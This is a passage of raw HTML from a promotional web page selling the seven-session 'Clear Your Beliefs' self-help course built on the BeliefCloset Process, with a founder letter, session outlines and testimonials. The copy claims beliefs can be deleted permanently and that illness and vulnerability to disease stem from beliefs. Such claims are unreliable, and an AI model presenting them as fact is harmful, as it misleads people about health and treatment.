</strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and 